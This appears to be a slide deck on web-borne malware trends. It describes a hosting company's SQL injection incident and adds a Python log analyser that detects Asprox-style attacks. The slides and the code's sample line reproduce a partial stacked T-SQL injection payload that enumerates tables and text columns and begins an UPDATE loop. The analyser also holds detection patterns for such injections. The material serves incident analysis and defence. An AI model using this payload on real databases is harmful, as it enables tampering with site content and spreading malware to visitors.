Web-Based Malware Menace Spreading Fast

Presented by: Garry Bennett, Marcelo Berger, Kelley Gambera, Elsa Madrigal, David Pessis, Chuck Roth, Fred Salchli

Outline
- Malware Behavior is Changing
- Interesting Trends
- Attack Techniques
- Attacks Not Mentioned in Paper
- More Popular Attack Techniques: SQL Injection
- SQL Injection: Attack at Duo!
- SQL Injection
- SQL Injection: Raw IIS Log
- SQL Injection: 1st Order Attack
- SQL Injection: 2nd Order Attack
- SQL Injection: Remediation
- More Popular Attack Techniques: Backend Virtual Hosting Companies
- How Malware Authors Reach Users
- Drive By Download
- Other Automatic Attack Methods
- Older Detection Techniques No Longer Work
- User-Assisted Attack Methods
- User-Assisted Attack Methods (cont'd)
- Symantec Top Web Threats 2008
- New Threats for 2009 and Beyond
- Methods of Defense
- SQL Injection Example
- SQL Injection Example (cont.)
- More Popular Attack Techniques: Search Engine Result Redirection Example

Malware Behavior is Changing
- Malware is no longer exclusive to malicious sites
- Malware reaches the end user's machine with no user interaction required
- Malware establishes a persistent presence on the end user's machine
- There has been explosive growth in new malicious code signatures
Table 1. New malicious code signatures. Source: Symantec Corporation.

Interesting Trends
- Malware is targeting mainstream sites
- In 2008, Economist.com and MLB.com were both hit
- Malware authors abused DoubleClick's ad-serving software
- Unsuspecting users clicked on what looked like legitimate ads; the ads delivered a Trojan that installed itself on the user's hard drive to collect personal information
- Malware authors are now looking for a bigger audience, and mainstream sites provide that base
- Users who visit these sites are less likely to be concerned about being the victim of a malware attack
- This is an increasing problem, since the notion of being safe as long as one visits "good" sites no longer holds true
- Web servers have evolved into complex code:
  - no longer a static page
  - third-party hosted material
  - network-layer communication and exposed weaknesses

Attack Techniques
- SQL injection
- Malicious advertisements
- Search engine result redirection
- Attacks on backend virtual hosting companies
- Vulnerabilities in web server or forum hosting software
- Cross-site scripting (XSS) attacks

Attacks Not Mentioned in Paper
- Sniffing and interception (HTTP vs. HTTPS)
- DNS server vulnerability exploits, which allow malicious sites to be served in place of legitimate ones
- Authenticity attacks

More Popular Attack Techniques: SQL Injection
- Large, high-traffic sites have databases running in the background
- Users read from and write to those databases through the site
- Security must extend to the databases and to the data itself
- How it works:
  - The attacker identifies an input (a form field or URL parameter) that the application concatenates into a SQL statement without validation
  - The attacker appends additional SQL instructions to that input
  - The attacker can then navigate the database and add malicious content (hidden links, script tags) to the stored data
  - E.g. Trojan.Asprox

SQL Injection: Attack at Duo!
- Longstanding client
- Client merged with another company that had an existing e-commerce application
- We hesitantly agreed to integrate and host the e-commerce application
- Code review and testing indicated security problems
- Client pushed back on the risk assessment and claimed the e-commerce site would be retired in the very near future
- Two years later ...

SQL Injection
- First-order attack: the injected input is executed immediately; the attacker gains access to the database and can run DML and/or DDL commands
- Second-order attack: the attacker stores data in the database that does its damage later, when the application reads it back and renders or executes it
- Our attacker did both
- Client called to report strange links appearing within the product pages of their site

SQL Injection: Raw IIS Log
The request as recorded by IIS (W3C extended format; part of the payload is elided):

  2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S=CAST([...]ozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 256

The numeric idCategory parameter is terminated with a semicolon and followed by a complete T-SQL batch, so the application's own query and the attacker's statements run as one stacked batch.

SQL Injection: 1st Order Attack
  POST /productcart/pc/viewCat_P.asp
  idCategory=57;DECLARE @S NVARCHAR(4000);SET @S=CAST("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)" AS NVARCHAR(4000));EXEC(@S);

The whole attack rides in a single parameter: the statement is delivered as one string literal, cast to NVARCHAR(4000) and executed with EXEC(@S). The cursor it declares enumerates every user table (a.xtype='u') together with every text-typed column in it (syscolumns.xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar), which is exactly the set of columns whose contents will later be rendered into web pages.

SQL Injection: 2nd Order Attack
  OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set

The loop walks the cursor and issues an UPDATE against each table/column pair it returns; the stored content is modified in place, and the "strange links" appear once the product pages render those columns.
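The detection side of the "How it works" description and the Raw IIS Log slide above, as an added example that is not code from the presentation: it parses IIS W3C extended log lines with the same field layout as the slide's line, URL-decodes the query string, and flags the stacked-statement pattern (`;DECLARE ... CAST(... AS NVARCHAR(4000)) ... EXEC(@S)`), the sysobjects/syscolumns enumeration and the Indy Library user agent. It also decodes the payload when it is carried as a hex-encoded NVARCHAR literal, which is the usual way these injections are delivered in the wild (an assumption here; the slide shows the payload already decoded). The field order, the sample lines, the IP addresses and the hex-encoded payload are all constructed for the example.

```python
"""Flag Asprox-style stacked SQL injection in IIS W3C extended log lines.

Added example, not code from the presentation. The log lines below are
constructed to mirror the field layout of the slide's line; the payload is
carried as a hex-encoded NVARCHAR literal (assumption: the slide shows it
decoded). IP addresses are documentation ranges, not real clients.
"""
import re
from urllib.parse import unquote_plus

# Assumed W3C field order, reconstructed from the slide's log line.
FIELDS = [
    "date", "time", "s-sitename", "s-computername", "cs-method",
    "cs-uri-stem", "cs-uri-query", "cs-username", "c-ip", "cs(User-Agent)",
    "cs(Cookie)", "cs(Referer)", "cs-host", "sc-status", "sc-substatus",
    "sc-win32-status", "sc-bytes", "cs-bytes", "time-taken",
]

# Inner statement from the 1st-order slide; used only to build the sample line.
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id "
    "and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)"
)


def hex_nvarchar(sql: str) -> str:
    """Encode a string as the 0x... literal T-SQL casts to NVARCHAR (UTF-16LE)."""
    return "0x" + sql.encode("utf-16-le").hex().upper()


def decode_hex_nvarchar(literal: str) -> str:
    """Reverse hex_nvarchar: recover the statement hidden in a 0x... literal."""
    return bytes.fromhex(literal[2:]).decode("utf-16-le")


# Constructed sample lines. IIS writes spaces inside a field as '+'.
ATTACK_LINE = (
    "2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp "
    "idCategory=57;DECLARE+@S+NVARCHAR(4000);SET+@S=CAST(" + hex_nvarchar(INNER_SQL)
    + "+AS+NVARCHAR(4000));EXEC(@S); - 192.0.2.10 Mozilla/3.0+(compatible;+Indy+Library) "
    "- - www.clientname.com 200 0 0 471 2377 256"
)
BENIGN_LINE = (
    "2008-04-12 18:01:02 W3SVC658304687 WEB14A GET /productcart/pc/viewCat_P.asp "
    "idCategory=57 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) "
    "- http://www.clientname.com/ www.clientname.com 200 0 0 18211 312 15"
)

# A second statement stacked after ';' where only a number was expected.
STACKED = re.compile(r";\s*(?:DECLARE|SET|EXEC(?:UTE)?|UPDATE|INSERT|DELETE|DROP)\b", re.I)
# CAST(0x... AS NVARCHAR): the payload smuggled in as a binary literal.
HEX_CAST = re.compile(r"CAST\(\s*(0x[0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)
# Schema enumeration as used by the cursor on the 1st-order slide.
SCHEMA_ENUM = re.compile(r"\bsys(?:objects|columns)\b", re.I)


def parse_w3c(line: str) -> dict:
    """Split one log line into a field dict; fields never contain raw spaces."""
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def analyse(line: str) -> dict:
    """Return the indicators found in one line plus the decoded payload, if any."""
    rec = parse_w3c(line)
    query = unquote_plus(rec["cs-uri-query"])  # '+' -> ' ', %xx -> char
    findings = []
    decoded = ""
    if STACKED.search(query):
        findings.append("stacked statement after ';' in a numeric parameter")
    m = HEX_CAST.search(query)
    if m:
        decoded = decode_hex_nvarchar(m.group(1))
        findings.append("hex-encoded NVARCHAR payload passed to EXEC")
    if SCHEMA_ENUM.search(query + " " + decoded):
        findings.append("schema enumeration via sysobjects/syscolumns")
    if "Indy Library" in unquote_plus(rec["cs(User-Agent)"]):
        findings.append("Indy Library user agent (automated client)")
    return {
        "time": f'{rec["date"]} {rec["time"]}', "client": rec["c-ip"],
        "uri": rec["cs-uri-stem"], "findings": findings, "decoded_payload": decoded,
    }


if __name__ == "__main__":
    for line in (ATTACK_LINE, BENIGN_LINE):
        r = analyse(line)
        print(r["time"], r["client"], r["uri"], "ALERT" if r["findings"] else "ok")
        for f in r["findings"]:
            print("  -", f)
        if r["decoded_payload"]:
            print("  payload:", r["decoded_payload"][:80], "...")
```

Run over a real log, the decoded payload is what tells you which tables and columns were touched; the status 200 on the slide's line is a reminder that the application answered the injected request normally, so response codes alone will not surface the attack.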